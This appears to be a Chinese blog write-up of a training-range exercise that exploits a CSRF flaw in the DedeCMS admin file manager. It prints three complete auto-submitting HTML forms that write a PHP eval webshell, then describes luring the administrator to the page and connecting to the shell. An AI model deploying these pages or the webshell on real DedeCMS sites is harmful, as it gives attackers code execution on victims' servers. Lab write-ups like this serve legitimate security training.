[zkaq靶场]CSRF--dedecms跨站请求伪造

最新推荐文章于 2024-01-22 09:07:05 发布
最新推荐文章于 2024-01-22 09:07:05 发布
阅读量756 收藏 5
点赞数 1
分类专栏: zkaq靶场 文章标签: csrf dedecms 跨站请求伪造 渗透测试 窃取cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116567728
版权

CSRF

靶场环境

首页:

image-20210324233358314

本地测试

dedecms。

在本地搭建dedecms测试环境。

后台提供的新建文件功能。

image-20210324224733949

第一步、测试新建文件功能:

点击新建文件:

在此处新建一个一句话木马。

image-20210324224859076

可以新建php文件。

第二步、生成CSRF Poc

这次我们新建一个2.php文件,文件内容依然是与上面一样的一句话木马。

然后抓包该请求。

image-20210324224216801

将该请求生成CSRF Poc。

保存成2.html。

然后在同一个浏览器的新标签页下打开2.html

image-20210324225359838

点击submit。

image-20210324225416953

image-20210324225426355

2.php文件新建成功。

这时,我们就可以认为此处存在CSRF漏洞。如果,我们将2.html进行一些美化,不需要点击submit,让它访问时就立刻新建文件。

一开始的2.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.17.144/dedecms/uploads/dede/file_manage_control.php" method="POST">
      <input type="hidden" name="fmdo" value="edit" />
      <input type="hidden" name="backurl" value="" />
      <input type="hidden" name="activepath" value="&#47;dedecms&#47;uploads&#47;uploads" />
      <input type="hidden" name="filename" value="2&#46;php" />
      <input type="hidden" name="str" value="&lt;&#63;php&#32;eval&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#63;&gt;" />
      <input type="hidden" name="B1" value="&#32;&#32;�&#191;&#157;&#32;�&#173;&#152;&#32;&#32;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

添加自动提交函数的2.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id="go" action="http://192.168.17.144/dedecms/uploads/dede/file_manage_control.php" method="POST">
      <input type="hidden" name="fmdo" value="edit" />
      <input type="hidden" name="backurl" value="" />
      <input type="hidden" name="activepath" value="&#47;dedecms&#47;uploads&#47;uploads" />
      <input type="hidden" name="filename" value="2&#46;php" />
      <input type="hidden" name="str" value="&lt;&#63;php&#32;eval&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#63;&gt;" />
      <input type="hidden" name="B1" value="&#32;&#32;�&#191;&#157;&#32;�&#173;&#152;&#32;&#32;" />
      <input type="submit" value="Submit request" />
    </form>
    <script type="text/javascript">
    	function autoSubmit() {
    		// 自动提交函数
    		document.getElementById('go').submit();
    	}
    	setTimeout(autoSubmit,50);//在指定的毫秒数后调用函数或计算表达式
    </script>
  </body>
</html>

靶场攻击:

靶场的首页地址为:

http://59.63.200.79:8010/newcsrf/

我们的测试环境首页地址为:

http://192.168.17.144/dedecms/uploads/

dedecms/uploads/=newcsrf/

根据上面的测试新建文件功能的时候可知,我们本地上传文件的工作目录为:/dedecms/uploads/uploads

那么我们需要文件上传的地址是**/newcsrf/uploads**下

我们2.html中表单提交的地址为:

http://192.168.17.144/dedecms/uploads/dede/file_manage_control.php

那么为了完成CSRF攻击,我们需要找到靶场的:dede/file_manage_control.php地址。

当我们访问这个地址时:59.63.200.79:8010/newcsrf/dede/file_manage_control.php,

会让我们跳转到login的链接。

但是当访问一个错误的地址时,会返回不存在。

访问/dede时跳转,访问错误的/dededdddd时会返回错误。

image-20210324234604803

说明/dede这个目录是存在的。

那么file_manage_control.php应该没有被修改,同样存在。

所以html中action的地址为:

http://59.63.200.79:8010/newcsrf/dede/file_manage_control.php

新建文件的工作目录改了,action 的地址也改了,那么就可以生成Poc了,然后保存成3.html。

然后上传3.html,在问题反馈页面诱导管理员点击。

image-20210325220944593

3.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id='a' action="http://59.63.200.79:8010/newcsrf/dede/file_manage_control.php" method="POST">
      <input type="hidden" name="fmdo" value="edit" />
      <input type="hidden" name="backurl" value="" />
      <input type="hidden" name="activepath" value="&#47;newcsrf&#47;uploads" />
      <input type="hidden" name="filename" value="2&#46;php" />
      <input type="hidden" name="str" value="&lt;&#63;php&#32;eval&#40;&#36;&#95;REQUEST&#91;2&#93;&#41;&#63;&gt;" />
      <input type="hidden" name="B1" value="&#32;&#32;ä&#191;&#157;&#32;å&#173;&#152;&#32;&#32;" />
      <input type="submit" value="Submit request" />
    </form>
	<script>
		function validate(){
			document.getElementById('a').submit();	
		}
		setTimeout(validate,100)
	</script>
  </body>	
</html>

在管理员访问该页面后,就会在newcsrf/uploads下生成2.php文件,然后访问2.php即可成功getshell。

image-20210325221149621

最后通过菜刀连接找到flag。

image-20210325221622284

ml>


在管理员访问该页面后,就会在newcsrf/uploads下生成2.php文件,然后访问2.php即可成功getshell。

[外链图片转存中...(img-CC01PY91-1620553593886)]

最后通过菜刀连接找到flag。

[外链图片转存中...(img-cPNByFt1-1620553593887)]

![image-20210325221652420](https://img-blog.csdnimg.cn/img_convert/fca2f8107f89c3dafda9d75fcc3d8447.png)
wwxxee
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSRF漏洞详解
m0_55854679的博客
03-09 1921
文章目录注意什么是CSRFCSRF的成因CSRF的危害CSRF的利用CSRF的测试常见CSRFCSRF的预防CSRF练习 注意 任何网以及互联网功能的本质:数据包的传递。 CSRF的核心是让客户端的浏览器去访问,SSRF核心是让服务器去访问。 XSS是窃取cookie,CSRF是利用cookie。 浏览器CORS【资源共享】的问题,不同的网发送JS请求浏览器会主动拦截删除Cookie,所以这种漏洞偏少。 什么是CSRF CSRF(Cross-site request forgery)请求
CSRF---zkaq
weixin_38237216的博客
04-02 331
1.CSRF概念与利用方式 概念:CSRF(Cross-site request forgery),中文名称:请求伪造 本质:浏览器在你不知情的情况下偷偷发送了数据包,借用cookie,获取信任 XSS与CSRF的区别: XSS:窃取cookie [能获取cookie] CSRF:借用/利用cookie [不能获取,只能利用、借用] 防御方式: Token(唯一解):Cookie里面有一段随机值,和请求包里面的GET或者POST传参有关联关系 2.靶场 发现环境为dedecms 在本地搭
CSRF——请求伪造
weixin_42633359的博客
10-18 210
1、CSRF请求伪造的流程 该过程存在三方:用户客户端、正常网A、恶意攻击网B(前提存在CSRF漏洞)   1、用户登陆了正常网A输入了相关的验证信息。   2、正常网将cookie写入浏览器,实现了状态保持   3、用户在未退出正常网的情况下访问了恶意网   4、恶意网指定了action=“正常网的url”,伪造请求参数。   5、用户在主观未知的情况下,再次访问了正常网...
dedecms网后台出现DedeCMSCSRF Token Check(解决办法)
qq_43557623的博客
01-05 543
  织梦网后台修改文件之后,在保存的时候出现DedeCMS:CSRF Token Check Failed!这样的提示,导致修改的文件无法正常保存。该怎么去解决呢?   出现DedeCMS:CSRF Token Check Failed!,是由于重新打开了一个需要CSRF校验(请求伪造)的表单页面。   下面跟大家一分享一下解决这个问题的办法。   一、工具/原料   1、dedecms文件   2、config.php文件   二、方法/步骤   1.我们在网后台修改一些辅助插件的时
DedeCMS 5.5靶机
zhangpeng999123的博客
04-26 709
实验内容 步骤一:信息收集 我们打开终端,输入firefox打开浏览器,访问网址就可以找到版本信息,在首页顶部和底部看到版本信息。 192.168.0.2 访问http://192.168.0.2/robots.txt也可以看见一些信息 这个时候,我们就可以去网络上搜索一些dedecms v5.5版本的漏洞。dedecms v5.5版本存在一个任意文件上传,得到shell的...
csrf漏洞之DedeCMS靶场漏洞(超详细)
最新发布
qq_59020256的博客
01-22 776
红色边框里面的数字会随着刷新而变化,由此可知存在token因此不能使用csrf注入。第一步,查找插入点,我选择了网栏目管理的先秦两汉作为插入点。第一个xss漏洞,存在于附件数据管理--->第二个漏洞存在于,内容管理-->更改内容管理。其他的csrf注入点类似,不一一赘述。第四步生成php脚本代码。第三步用burp拦截包。第五步点击submit。第六步提交显示修改成功。
CSRF(请求伪造)详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
qingmvc#qingmvc#CSRF-请求伪造1
07-25
Cross-site request forgery 请求伪造常见的请求伪造:微博关注操作:get,访问一条链接就关注成功 【除非是某种不受限的api】
Django CSRF请求伪造防护过程解析
09-18
CSRF(请求伪造)是一种常见的网络安全威胁,攻击者利用用户的已登录状态,在用户不知情的情况下,通过恶意网发起对受害者的合法网请求,执行非用户意愿的操作。Django框架提供了一套强大的CSRF防护机制,...
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2440
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
dedecms v5.7 CSRF保护措施绕过漏洞
积善之家
09-13 214
漏洞 dedecms v5.7 CSRF保护措施绕过漏洞 简介 Dedecms V5.7SP2正式版(2018-01-09),对函数输出校验不当导致可以传入恶意数组绕过CSRF防御。 文件 /dede/config.php 修复 打开 /dede/config.php 找到大概在67行 if(!isset($token) || strcasecmp($token, $_SESSION[\'token\']) != 0){ 改成 if(!isset($token) || s...
请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 2821
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRF? CSRF(Cross-site request forgery)请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网的恶意利用。尽管听起来像脚本(XSS),但它与XSS非常不同,XSS利用点内的信
阿里云关于 dedecms v5.7 CSRF保护措施绕过漏洞修复
weixin_41165585的博客
10-22 515
找到项目路径下的/dede/config.php文件的第70行附近的 ** csrf_check() **函数 function csrf_check() { global $token; if(!isset($token) || strcasecmp($token, $_SESSION['token']) != 0){ echo '<a href="htt...
dedecmsv5.7织梦CSRF保护措施绕过漏洞
09-06 230
自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示。Dedecms V5.7SP2正式版(2018-01-09),对函数输出校验不当导致可以传入恶意数组绕过CSRF防御。打开 /dede/config.php 找到大概在67行。
vulfocus——dedecms文件上传(CVE-2019-8933)
m0_62063669的博客
09-14 646
Desdev DedeCMS(织梦内容管理系统)是一套基于PHP的开源内容管理系统(CMS),具有内容发布、内容管理、内容编辑和内容检索等功能。远程攻击者可在通过添加新模板时,将文件名../index.html更改成../index.php,利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。3. 模板=>默认模板管理=>新建模板。4.写入一句话木马,然后保存。6.用蚁剑连接一句话木马。5.访问一下这个文件。
关于织梦后台DedeCMS:CSRFTokenCheckFailed提示的处理方法
莫吧seo的博客
03-28 6407
使用织梦搭建网的过程中,在官网下载的dede后台程序,在后台文件管理器中修改php或者css文件,保存之后会出现DedeCMS:CSRF Token Check Failed这样一个提示,无法保存修改的文件,那么DedeCMS:CSRF Token Check Failed到底是什么意思呢?怎么去解决呢?CSRF(Cross-site request forgery),中文名称:请求伪造,也...
【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933
10-16 3478
【dedecms-文件上传】后缀
一次渗透测试引发的Json格式下CSRF攻击的探索
weixin_52501704的博客
03-10 538
一次渗透测试引发的Json格式下CSRF攻击的探索
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 1853
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网、个人网、企业和学习网建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
CSRF请求伪造漏洞
12-06
CSRF(Cross-site request forgery)请求伪造是一种网络攻击方式,攻击者通过伪造用户请求来冒充用户身份,从而进行一些非法操作。攻击者通常会在第三方网上设置陷阱,引诱用户点击链接或者访问页面,从而触发CSRF攻击。攻击者可以通过这种方式窃取用户的个人信息、账号密码等敏感信息,或者进行一些非法操作,比如在用户不知情的情况下转账、购买商品等。 CSRF攻击的过程一般包括以下几个步骤: 1. 攻击者在第三方网上设置陷阱,比如在网页中插入一个图片或者链接。 2. 用户在浏览器中访问第三方网,触发了陷阱,浏览器会自动向被攻击网发送请求。 3. 被攻击网接收到请求后,会认为这是用户的合法请求,从而执行相应的操作,比如转账、购买商品等。 防御CSRF攻击的方法包括: 1. 在表单中添加随机的token,防止攻击者伪造请求。 2. 检查Referer头部,确保请求来源于合法的网。 3. 在cookie中添加SameSite属性,限制cookie只能在同请求中发送,从而防止请求伪造攻击。 --相关问题--: 1. 什么是XSS漏洞? 2. 如何防御XSS攻击? 3

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值